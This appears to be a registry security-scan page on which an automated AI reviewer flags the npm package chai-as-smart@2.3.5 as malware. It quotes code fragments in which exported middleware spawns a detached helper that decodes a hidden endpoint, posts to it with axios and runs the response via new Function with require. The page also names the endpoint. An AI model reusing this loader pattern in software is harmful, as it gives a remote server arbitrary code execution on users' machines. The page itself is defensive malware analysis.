registry  /  chai-as-smart  /  2.3.5

chai-as-smart@2.3.5

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Runtime use of the exported middleware launches a detached helper that contacts a remote endpoint and executes the HTTP response as JavaScript. This is concrete remote code execution controlled by an external service.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Calling the package's exported middleware function from index.js.
Impact
Arbitrary code execution in the consuming project at runtime, with require access in the child process.
Mechanism
detached child process downloads and executes remote JavaScript via new Function
Attack narrative
A consumer imports chai-as-smart and invokes the exported middleware. index.js starts a detached Node child running lib/initializeCaller.js. That helper decodes a hidden Vercel API URL, POSTs to it, then passes response.data into new Function with require and immediately executes it, giving the remote service arbitrary runtime code execution.
Rationale
Source inspection confirms a runtime remote payload execution chain, not merely suspicious primitives: detached child_process spawn in index.js leads to axios network fetch and execution of response.data in lib/initializeCaller.js. Although it does not run at npm install time and does not appear to send real environment variables, the remote code execution behavior is malicious.
Evidence
package.jsonindex.jslib/initializeCaller.js
Network endpoints1
ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df

Decision evidence

public snapshot
AI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js exports middleware that spawns detached node lib/initializeCaller.js when the exported function is invoked.
  • lib/initializeCaller.js decodes a base64 HTTPS endpoint and posts data to it with axios.
  • lib/initializeCaller.js constructs new Function("require", response.data) and executes server-controlled code.
  • The child process is detached with stdio ignored, hiding the remote execution from the caller.
  • package.json has no install hooks; execution is runtime/import-consumer invoked rather than install-time.
Evidence against
  • The local process.env is shadowed in lib/initializeCaller.js, so the observed POST body contains hardcoded DEV_* values rather than real environment variables.
  • No filesystem writes, persistence, npm lifecycle hook, or AI-agent control-surface mutation observed in inspected files.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 17 file(s), 53.3 KB of source, external domains: github.com

Source & flagged code

7 flagged · loading source
index.jsView file
3const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
3Cross-file remote execution chain: index.js spawns lib/initializeCaller.js; helper contains network access plus dynamic code execution. L3: const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants'); ... L37: function runBackgroundTask(args) { L38: const scriptPath = path.resolve(__dirname, './lib/initializeCaller.js'); L39:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

index.jsView on unpkg · L3
matchType = malicious_source_fingerprint_signature signature = 3522c2fe164c56ca signatureType = suspicious_hashes sourceLabel = Datadog matchedPackage = dotenv-pack@2.3.10 matchedPath = index.js matchedIdentity = npm:ZG90ZW52LXBhY2s:2.3.10 similarity = 1.000 shingleOverlap = 12 summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/dotenv-pack/2.3.10/2026-06-01-dotenv-pack-v2.3.10.zip
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
lib/initializeCaller.jsView file
28.then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Eval

Package source references dynamic code evaluation.

lib/initializeCaller.jsView on unpkg · L28
13const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); L15: const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializeCaller.jsView on unpkg · L13
2L3: const axios = require("axios"); L4: const process = { ... L12: (async function initializeCaller(..._args) { L13: const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L2
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

6 High3 Medium3 Low
HighChild Processindex.js
HighEvallib/initializeCaller.js
HighSame File Env Network Executionlib/initializeCaller.js
HighCross File Remote Execution Contextindex.js
HighBase64 Obscured Urllib/initializeCaller.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings